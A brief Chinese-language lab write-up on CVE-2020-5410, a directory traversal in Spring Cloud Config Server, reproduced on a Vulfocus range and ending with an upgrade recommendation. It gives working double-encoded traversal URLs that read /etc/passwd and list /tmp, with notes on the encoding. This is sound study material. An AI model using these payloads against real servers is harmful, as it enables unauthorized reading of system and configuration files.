Spring 目录遍历 (CVE-2020-5410)~vulfocus/spring-cve_2020_5410:latest

0x01 描述

Spring Cloud Config是美国威睿（VMware）公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config，2.2.3之前的2.2.x版本，2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求，这可能导致目录遍历攻击。

0x02 靶场地址

靶场地址:http://vulfocus.io/#/dashboard?image_id=3e5a30fd-4426-4619-a35f-c7ac9b18d5cb
靶场名称：vulfocus/spring-cve_2020_5410:latest

0x03 打靶复现

1. 启动环境，访问url

2. 构造POC
   访问etc/passwd

http://xxx.xxxx.com/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fpasswd%23foo/development

访问/tmp

http://xxx.xxxx.com/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Ftmp%23foo/development

成功获得flag，环境启动比较慢；访问poc时可能会失败，多试几次或者换个浏览器。
tips:
%25 ===>%
%2f =>/
%23=>#

0x04 修复建议

升级到 Spring Cloud Config 至最新版本。